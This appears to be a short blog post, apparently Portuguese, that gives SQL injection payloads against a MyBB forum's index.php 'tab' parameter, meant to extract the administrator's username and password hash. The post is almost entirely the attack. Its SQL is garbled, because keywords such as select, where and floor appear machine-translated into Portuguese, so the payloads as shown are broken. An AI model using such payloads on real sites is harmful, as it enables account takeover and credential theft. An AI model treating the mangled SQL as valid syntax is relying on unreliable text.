$ ~ Http://localhost/mybbpath/index.php?tab = [SQLI]
---------------------------------------
# ~ ~ # Expl0itation
---------------------------------------
$ ~ Obter nome de usuário do administrador (geralmente tem uid = 1) ~
http://localhost/mybbpath/index.php?tab=1 '
e (selecione 1 (select count (*), concat ((SELECT nome de usuário
mybb_users onde uid = 1), piso (Rand (0) * 2)) de uma
INFORMATION_SCHEMA.TABLES grupo, por um b)) ---
$ ~ Obter a senha do administrador ~
http://localhost/mybbpath/index.php?tab=1 '
e (selecione 1 (select count (*), concat ((selecione senha
mybb_users onde uid = 1), piso (Rand (0) * 2)) de uma
INFORMATION_SCHEMA.TABLES grupo, por um b)) ---
Nenhum comentário:
Postar um comentário